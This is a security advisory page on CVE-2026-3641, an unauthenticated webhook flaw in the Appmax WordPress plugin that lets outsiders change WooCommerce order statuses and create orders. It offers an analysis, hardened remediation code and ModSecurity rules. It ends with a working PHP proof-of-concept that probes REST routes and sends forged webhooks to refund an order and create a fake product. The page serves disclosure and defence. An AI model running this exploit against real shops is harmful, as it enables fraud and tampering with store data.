Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 28, 2026

CVE-2026-3641: Appmax <= 1.0.3 – Missing Authorization to Order Status Manipulation and Arbitrary Order Creation via Webhook Endpoint (appmax)

CVE ID CVE-2026-3641
Plugin appmax
Severity Medium (CVSS 5.3)
CWE 20
Vulnerable Version 1.0.3
Patched Version
Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3641 (metadata-based):
The Appmax WordPress plugin, version 1.0.3 and earlier, exposes an unauthenticated webhook endpoint. The plugin registers a public REST API route at /webhook-system without authentication, origin verification or input validation, which lets an unauthenticated remote attacker change the status of existing WooCommerce orders and create arbitrary orders.

Atomic Edge research identifies the root cause as improper input validation (CWE-20) combined with missing authorization controls: the plugin processes webhook payloads without verifying where they came from. The vulnerability description confirms that the plugin acts directly on untrusted ‘event’ and ‘data’ parameters. From that, this analysis infers that the route is registered with register_rest_route() either without a permission_callback or with a permissive one such as __return_true, and that the raw POST data is passed straight into WooCommerce order processing functions.

Exploitation requires sending crafted POST requests to the vulnerable endpoint. Attackers target /wp-json/appmax/v1/webhook-system or a similar REST route (the exact path, event names and payload layout are inferred from the advisory metadata, not read from the plugin source). The payload carries ‘event’ and ‘data’ parameters mimicking legitimate Appmax webhook events; plausible events are ‘order.created’, ‘order.updated’ or ‘product.created’, with ‘data’ holding the JSON order or product fields. An attacker who guesses a valid order ID can change its status to ‘processing’, ‘refunded’ or ‘cancelled’, or can create new orders with arbitrary customer data and pricing.

Remediation requires webhook signature validation and proper authorization. The plugin must verify that each request originates from Appmax using an HMAC signature computed over the raw request body (or, at minimum, a shared secret), compared in constant time. Atomic Edge recommends a permission_callback on the route that performs this check before the handler runs, so an unsigned request is rejected with 403 before any order is touched. The handler should also validate and sanitize every parameter, restricting status changes to an allow-list rather than writing whatever the payload contains. WordPress nonces are unsuitable for webhook endpoints because an external service cannot obtain them; cryptographic verification of request authenticity is the correct control.
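As an added illustration of the two points above (this is not the Appmax plugin's own code, whose source the analysis only infers), the following shows the inferred vulnerable registration as a comment beside a hardened registration that verifies an HMAC in permission_callback and allow-lists the status transition. The route name, the X-Appmax-Signature header, the appmax_webhook_secret option, the hex HMAC-SHA256 format and the event names are assumptions chosen for the example, not values taken from Appmax.

```php
<?php
// Added example, not Appmax plugin code. Drop into a WordPress plugin with
// WooCommerce active. Header name, option name, signature format and event
// names below are assumptions for illustration.

/*
 * Inferred vulnerable form: no permission_callback worth the name, so any
 * unauthenticated client can drive the handler.
 *
 * register_rest_route('appmax/v1', '/webhook-system', [
 *     'methods'             => 'POST',
 *     'callback'            => 'appmax_handle_webhook',
 *     'permission_callback' => '__return_true',
 * ]);
 */

/**
 * Verify a hex HMAC-SHA256 over the exact raw request body (assumed format).
 * Signing a re-encoded array instead of the raw bytes breaks verification,
 * so the raw body is what must be signed on both sides.
 */
function appmax_verify_signature(string $raw_body, ?string $header, string $secret): bool
{
    if ($header === null || $header === '' || $secret === '') {
        return false;
    }
    $expected = hash_hmac('sha256', $raw_body, $secret);
    // hash_equals() is constant-time; a plain === leaks timing information.
    return hash_equals($expected, strtolower(trim($header)));
}

/** permission_callback: runs before the handler; reject unsigned requests with 403. */
function appmax_webhook_permission(WP_REST_Request $request)
{
    $secret = (string) get_option('appmax_webhook_secret', ''); // assumed option name
    $sig    = $request->get_header('x-appmax-signature');      // assumed header name
    if (!appmax_verify_signature($request->get_body(), $sig, $secret)) {
        return new WP_Error('rest_forbidden', 'Invalid webhook signature', ['status' => 403]);
    }
    return true;
}

add_action('rest_api_init', function () {
    register_rest_route('appmax/v1', '/webhook-system', [
        'methods'             => 'POST',
        'callback'            => 'appmax_handle_webhook',
        'permission_callback' => 'appmax_webhook_permission',
        // Schema validation runs after the permission check and rejects
        // unknown events before the handler sees them.
        'args' => [
            'event' => [
                'required' => true,
                'type'     => 'string',
                'enum'     => ['order.created', 'order.updated'], // assumed event names
            ],
            'data'  => ['required' => true, 'type' => 'object'],
        ],
    ]);
});

/** Handler: only allow-listed status transitions on an order that exists. */
function appmax_handle_webhook(WP_REST_Request $request)
{
    $event = $request->get_param('event');
    $data  = (array) $request->get_param('data');

    if ($event === 'order.updated') {
        $order = wc_get_order((int) ($data['order_id'] ?? 0));
        if (!$order) {
            return new WP_Error('appmax_not_found', 'Unknown order', ['status' => 404]);
        }
        $allowed = ['processing', 'completed', 'cancelled', 'refunded'];
        $status  = sanitize_key($data['status'] ?? '');
        if (!in_array($status, $allowed, true)) {
            return new WP_Error('appmax_bad_status', 'Status not permitted', ['status' => 400]);
        }
        $order->update_status($status, 'Status set by verified Appmax webhook');
    }

    return rest_ensure_response(['ok' => true]);
}
```

Two details matter in practice: the sender must compute the HMAC over the byte-for-byte request body it transmits, and the secret must be provisioned out of band (a plugin setting, never a value carried in the request). Including a timestamp in the signed material and rejecting stale values is a sensible further step against replay of a captured valid webhook.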

Successful exploitation impacts store operations and data integrity. Attackers can disrupt business by marking paid orders as refunded or cancelling pending orders, and can create fraudulent orders that appear legitimate in the WooCommerce dashboard. If product events are processed as well, inventory can be polluted with malicious listings. The CVSS vector records no confidentiality impact (C:N) and low integrity impact (I:L), but for a store that integrity impact is a real business risk: financial losses from order manipulation and operational overhead from cleaning up tampered data.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE. Note that it requires SecRequestBodyAccess On (REQUEST_BODY is empty otherwise) and that it denies every POST to the webhook route carrying an order or product event, which includes the legitimate Appmax callbacks; treat it as a stop-gap until a patched plugin version is available.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-3641 (metadata-based)
# Requires SecRequestBodyAccess On so that REQUEST_BODY is populated in phase 2.
# Rule 1: POST to the webhook route with no Content-Type header at all.
SecRule REQUEST_URI "@rx ^/(wp-json/|index\.php\?rest_route=/)appmax/(v\d+/)?webhook(-system)?" \
  "id:20263641,phase:2,deny,status:403,chain,msg:'CVE-2026-3641: Appmax plugin unauthorized webhook access',severity:'CRITICAL',tag:'CVE-2026-3641',tag:'WordPress',tag:'Appmax',tag:'WooCommerce'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule &REQUEST_HEADERS:Content-Type "@eq 0" "chain"
      SecRule REQUEST_BODY "@rx \"event\"\s*:\s*\"(order\.|product\.)" \
        "setvar:'tx.cve_2026_3641_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

# Rule 2: same route, JSON Content-Type.
SecRule REQUEST_URI "@rx ^/(wp-json/|index\.php\?rest_route=/)appmax/(v\d+/)?webhook(-system)?" \
  "id:20263642,phase:2,deny,status:403,chain,msg:'CVE-2026-3641: Appmax plugin unauthorized webhook access (JSON)',severity:'CRITICAL',tag:'CVE-2026-3641',tag:'WordPress',tag:'Appmax'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_HEADERS:Content-Type "@contains application/json" "chain"
      SecRule REQUEST_BODY "@rx \"event\"\s*:\s*\"(order\.|product\.)" \
        "setvar:'tx.cve_2026_3641_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3641 - Appmax <= 1.0.3 - Missing Authorization to Order Status Manipulation and Arbitrary Order Creation via Webhook Endpoint

/**
 * Proof of Concept for CVE-2026-3641
 * Assumptions based on vulnerability description:
 * 1. REST endpoint at /wp-json/appmax/v1/webhook-system (common WordPress REST pattern)
 * 2. Accepts POST requests with 'event' and 'data' parameters
 * 3. No authentication or signature validation required
 * 4. Plugin processes arbitrary webhook events
 */

$target_url = 'https://vulnerable-site.com';

// Common WordPress REST API endpoint patterns for plugin webhooks
$endpoint_candidates = [
    '/wp-json/appmax/v1/webhook-system',
    '/wp-json/appmax/v1/webhook',
    '/wp-json/appmax/webhook-system',
    '/index.php?rest_route=/appmax/v1/webhook-system'
];

/**
 * POST a JSON-encoded webhook payload to $url without any signature header
 * and return [HTTP status code, response body].
 */
function appmax_send_webhook(string $url, array $payload): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => json_encode($payload),
        CURLOPT_HTTPHEADER     => [
            'Content-Type: application/json',
            'User-Agent: Atomic-Edge-PoC/1.0'
        ],
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 15,
        // Lab targets commonly use self-signed certificates; leave verification
        // enabled when the target has a valid certificate.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ]);
    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return [$http_code, $response === false ? '' : $response];
}

// Order status manipulation payload
$payload = [
    'event' => 'order.updated',
    'data' => [
        'order_id' => 123,
        'status' => 'refunded',
        'reason' => 'Atomic Edge test exploit',
        'timestamp' => time()
    ]
];

$hit = null;
foreach ($endpoint_candidates as $endpoint) {
    $url = $target_url . $endpoint;
    [$http_code, $response] = appmax_send_webhook($url, $payload);

    echo "Testing: $url\n";
    echo "HTTP Code: $http_code\n";
    echo "Response: $response\n\n";

    // A 2xx means the route exists and accepted the unauthenticated event;
    // WordPress answers 404 (rest_no_route) when the route is not registered.
    if ($http_code >= 200 && $http_code < 300) {
        echo "[+] Potential success at: $url\n";
        echo "[+] Sent payload to change order 123 status to 'refunded'\n";
        $hit = $url;
        break;
    }
}

// Alternative payload for creating a fake product, sent to the endpoint that
// accepted the first event
$product_payload = [
    'event' => 'product.created',
    'data' => [
        'name' => 'Atomic Edge Test Product',
        'description' => 'Created via CVE-2026-3641 exploit',
        'price' => 0.01,
        'sku' => 'ATOMIC-EDGE-TEST'
    ]
];

if ($hit !== null) {
    echo "\nTesting product creation payload...\n";
    [$http_code, $response] = appmax_send_webhook($hit, $product_payload);
    echo "HTTP Code: $http_code\n";
    echo "Response: $response\n";
} else {
    echo "[-] No candidate endpoint accepted the webhook payload\n";
}
